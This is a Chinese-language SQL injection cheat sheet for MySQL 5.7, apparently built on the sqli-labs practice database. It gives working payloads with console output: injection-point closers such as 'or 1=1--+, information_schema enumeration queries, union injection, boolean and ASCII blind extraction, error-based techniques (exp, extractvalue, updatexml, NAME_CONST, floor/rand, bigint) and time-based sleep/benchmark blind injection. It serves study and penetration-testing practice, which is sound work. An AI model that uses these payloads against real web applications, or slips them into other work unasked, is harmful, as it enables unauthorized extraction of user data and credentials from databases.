系统函数（信息收集）：version() 决定后面哪些报错函数可用；user() 的权限决定能读哪些 information_schema 内容；@@datadir / @@basedir 用于定位数据与安装路径，配合 into outfile 等文件操作时还受 FILE 权限和 secure_file_priv 的限制。
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.7.25 |
+-----------+
1 row in set (0.00 sec)
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select database();
+------------+
| database() |
+------------+
| security |
+------------+
1 row in set (0.00 sec)
mysql> select @@datadir;
+-----------------------------------+
| @@datadir |
+-----------------------------------+
| D:\mysql-5.7.25-winx64\data\ |
+-----------------------------------+
1 row in set (0.00 sec)
mysql> select @@version_compile_os;
+----------------------+
| @@version_compile_os |
+----------------------+
| Win64 |
+----------------------+
1 row in set (0.00 sec)
mysql> select @@basedir;
+------------------------------+
| @@basedir |
+------------------------------+
| D:\mysql-5.7.25-winx64\ |
+------------------------------+
1 row in set (0.00 sec)
字符串连接函数
# concat 不带分隔符地连接字符串；注意任一参数为 NULL 时整体返回 NULL（这就是后面示例用 ifnull 包裹字段的原因）
mysql> select concat("s", "elect");
+----------------------+
| concat("s", "elect") |
+----------------------+
| select |
+----------------------+
1 row in set (0.00 sec)
# concat_ws 带分隔符地连接字符串；与 concat 不同，它会跳过 NULL 参数而不是整体返回 NULL
mysql> select concat_ws(",", "a", "b", "c");
+-------------------------------+
| concat_ws(",", "a", "b", "c") |
+-------------------------------+
| a,b,c |
+-------------------------------+
1 row in set (0.00 sec)
mysql> select concat_ws("|", "a", "b", "c");
+-------------------------------+
| concat_ws("|", "a", "b", "c") |
+-------------------------------+
| a|b|c |
+-------------------------------+
1 row in set (0.00 sec)
# group_concat 把一组内的所有字符串连接起来，默认以逗号分隔（可用 separator 指定）；结果长度受 group_concat_max_len（默认 1024 字节）限制，超出部分会被静默截断，字段多时需用 limit/offset 分段取
mysql> select group_concat(username) from users;
+---------------------------------------------------------+
| group_concat(username) |
+---------------------------------------------------------+
| Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin |
+---------------------------------------------------------+
1 row in set (0.02 sec)
information_schema
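# List every schema visible to the current account.
select schema_name from information_schema.SCHEMATA;
# Tables of the current database only (table_schema filter keeps other
# databases' tables out of the result).
select table_name from information_schema.tables WHERE table_schema=database();
# Columns of one table. Always filter on table_schema as well: without it the
# columns of every same-named table in every database (e.g. mysql.user) are
# merged into a single group_concat result and cannot be told apart.
# NOTE: the sample data on this page lives in table `users`; adjust table_name
# to the table actually being enumerated. The output is still subject to the
# group_concat_max_len truncation described above.
select group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='user';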
一般用于闭合/探测注入点的语句片段（分别对应无引号、单引号、双引号以及带一层或两层括号的不同 SQL 拼接上下文）
or 1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
") or 1=1--+
"))or 1=1--+
一般GET请求中的+会被自动解码为空格，也可以用%20来代替空格。写成 --+ 的原因是 MySQL 的 -- 注释要求后面紧跟一个空白字符，+ 解码后正好提供了这个空格；在 POST 正文或直接执行 SQL 时应写成 "-- "（带空格），否则注释不生效。
使用#注释时需编码为%23，因为URL中的#是片段标识符，浏览器不会把#及其后面的内容发送到服务端。
union 操作符
UNION 操作符用于合并两个或多个 SELECT 语句的结果集，但 UNION 内部的各个 SELECT 语句必须拥有相同数量的列，列数不一致会直接报错（The used SELECT statements have a different number of columns）；注入时通常先用 order by N 或逐个增加占位列来确定列数。MySQL 不要求各列的类型一致，下例中 id 列与字符串列互换仍可执行。
默认地，UNION 会去除重复的行；如果要保留重复的行，请使用 UNION ALL。
mysql> (select id, username from users limit 1) union (select 1, 2);
+----+----------+
| id | username |
+----+----------+
| 1 | Dumb |
| 1 | 2 |
+----+----------+
2 rows in set (0.00 sec)
mysql> (select id, username from users limit 1) union (select username, id from users limit 1);
+------+----------+
| id | username |
+------+----------+
| 1 | Dumb |
| Dumb | 1 |
+------+----------+
2 rows in set (0.00 sec)
mysql> (select id, username from users limit 1) union (select id,username from users limit 1);
+----+----------+
| id | username |
+----+----------+
| 1 | Dumb |
+----+----------+
1 row in set (0.00 sec)
mysql> (select id, username from users limit 1) union all (select id,username from users limit 1);
+----+----------+
| id | username |
+----+----------+
| 1 | Dumb |
| 1 | Dumb |
+----+----------+
2 rows in set (0.00 sec)
正则（regexp / rlike）：在默认的非二进制字符串比较下不区分大小写，需要区分大小写时先用 binary 转换再匹配
mysql> select username from users WHERE username regexp '^D';
+----------+
| username |
+----------+
| Dumb |
| Dummy |
+----------+
2 rows in set (0.01 sec)
mysql> select user() regexp '^r';
+--------------------+
| user() regexp '^r' |
+--------------------+
| 1 |
+--------------------+
1 row in set (0.00 sec)
逻辑判断（布尔盲注）：字符串比较在默认的 _ci 排序规则下不区分大小写，所以 left(database(),1)='s' 与 ='S' 结果相同；需要精确区分大小写时用下一节的 ascii/ord 比较数值
mysql> select left(database(), 1)= 's';
+--------------------------+
| left(database(), 1)= 's' |
+--------------------------+
| 1 |
+--------------------------+
1 row in set (0.00 sec)
mysql> select left(database(), 1)> 's';
+--------------------------+
| left(database(), 1)> 's' |
+--------------------------+
| 0 |
+--------------------------+
1 row in set (0.00 sec)
逐字符 ASCII 判断（布尔盲注的二分法基础）
mysql> SELECT ascii(substr("emails", 1, 1));
+-------------------------------+
| ascii(substr("emails", 1, 1)) |
+-------------------------------+
| 101 |
+-------------------------------+
1 row in set (0.00 sec)
# ascii 和 ord 对单字节字符返回相同的值；区别在于 ascii 只取最左边一个字节，ord 对多字节字符会返回整个多字节编码值
# substr 和 mid 函数一样（mid 是 substr 的同义函数）
mysql> SELECT ord(substr("emails", 1, 1));
+-----------------------------+
| ord(substr("emails", 1, 1)) |
+-----------------------------+
| 101 |
+-----------------------------+
1 row in set (0.00 sec)
mysql> SELECT ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1));
+----------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1)) |
+----------------------------------------------------------------------------------------------------------------+
| 101 |
+----------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101;
+--------------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101 |
+--------------------------------------------------------------------------------------------------------------------+
| 1 |
+--------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT ord(mid((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101;
+---------------------------------------------------------------------------------------------------------------+
| ord(mid((select table_name from information_schema.tables where table_schema =database() limit 1), 1, 1))=101 |
+---------------------------------------------------------------------------------------------------------------+
| 1 |
+---------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select ifnull(cast(username as char), 0x20) from users order by id limit 1;
+--------------------------------------+
| ifnull(cast(username as char), 0x20) |
+--------------------------------------+
| Dumb |
+--------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT ord(mid((select ifnull(cast(username as char), 0x20) from users order by id limit 1), 1, 1))=0x44;
+---------------------------------------------------------------------------------------------------+
| ord(mid((select ifnull(cast(username as char), 0x20) from users order by id limit 1), 1, 1))=0x44 |
+---------------------------------------------------------------------------------------------------+
| 1 |
+---------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
exp报错（原理）：exp(x) 在 x 达到 710 时 DOUBLE 溢出报错；对字符串做按位取反 ~ 会先把它转成整数再得到接近 2^64 的无符号大数，所以 exp(~(子查询)) 必然溢出，而本例 5.7.25 的报错信息中回显了子查询的值。该方法依赖应用把数据库错误原样返回给客户端，错误被吞掉时需改用盲注。
mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
mysql> select log(15);
+------------------+
| log(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select ln(15);
+------------------+
| ln(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
| 15 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select ~0;
+----------------------+
| ~0 |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~(select version());
+----------------------+
| ~(select version()) |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
exp报错注入（下面的示例与上一节完全相同，此处仅作汇总；参考链接见本节末尾）
mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
mysql> select log(15);
+------------------+
| log(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select ln(15);
+------------------+
| ln(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
| 15 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select ~0;
+----------------------+
| ~0 |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~(select version());
+----------------------+
| ~(select version()) |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
参考:https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/
-- extractvalue(): XPath function; an invalid XPath expression (here the 0x7e '~'
-- wrapping) makes MySQL echo the offending string in the error text. The echoed
-- string is capped at 32 characters, so page through long values with substr().
extractvalue(1,concat(0x7e,(select @@version),0x7e))
--+ mysql 对 xml 数据进 行查询和修改的 xpath 函数,xpath 语法错误
-- updatexml(): same mechanism and same 32-character cap as extractvalue().
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
--+ mysql 对 xml 数据进行 查询和修改的 xpath 函数,xpath 语法错误
-- NAME_CONST(): two columns with the same alias inside a derived table raise
-- "Duplicate column name '<value>'", leaking the value. Both arguments are
-- expected to be constants (version() qualifies); a non-constant expression
-- or subquery is typically rejected instead of leaking anything.
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
--+ mysql 重复特性,此处重复了 version,所以报错
-- floor(rand(0)*2) + group by: rand(0) yields a deterministic sequence, so the
-- computed group key collides and raises "Duplicate entry '<value>1' for key
-- 'group_key'", leaking the concat'd key. Needs at least 3 rows in the FROM
-- table (information_schema.tables always has enough).
select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x
bigint注入（BIGINT 溢出报错）：原理与 exp 类似，利用 ~0 = 18446744073709551615 再参与 +1 等算术运算触发 BIGINT UNSIGNED 溢出错误，错误信息中同样可能带出子查询的值；下面沿用的是 exp 的例子，具体 bigint 写法见参考链接
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
参考:https://osandamalith.com/2015/07/08/bigint-overflow-error-based-sql-injection/
基于时间的盲注：sleep() 本身返回 0，因此判断依据是响应耗时而不是返回值（下例条件为假时才执行 sleep(5)，耗时 5.00 sec）。注意 sleep 放在 WHERE 中会对每一匹配行各执行一次，延时会按行数成倍增加；benchmark() 的耗时取决于服务器负载和 CPU，不如 sleep 稳定，且 5.7 中 encode() 已废弃，每次调用都会产生告警
mysql> select if(ascii(substr(database(),1,1))>115, 0, sleep(5));
+----------------------------------------------------+
| if(ascii(substr(database(),1,1))>115, 0, sleep(5)) |
+----------------------------------------------------+
| 0 |
+----------------------------------------------------+
1 row in set (5.00 sec)
mysql> SELECT IF(SUBSTRING(database(),1,1)=char(115),BENCHMARK(5000000,ENCODE('M SG','by 5 seconds')),null);
+-----------------------------------------------------------------------------------------------+
| IF(SUBSTRING(database(),1,1)=char(115),BENCHMARK(5000000,ENCODE('M SG','by 5 seconds')),null) |
+-----------------------------------------------------------------------------------------------+
| 0 |
+-----------------------------------------------------------------------------------------------+
1 row in set, 65535 warnings (1.16 sec)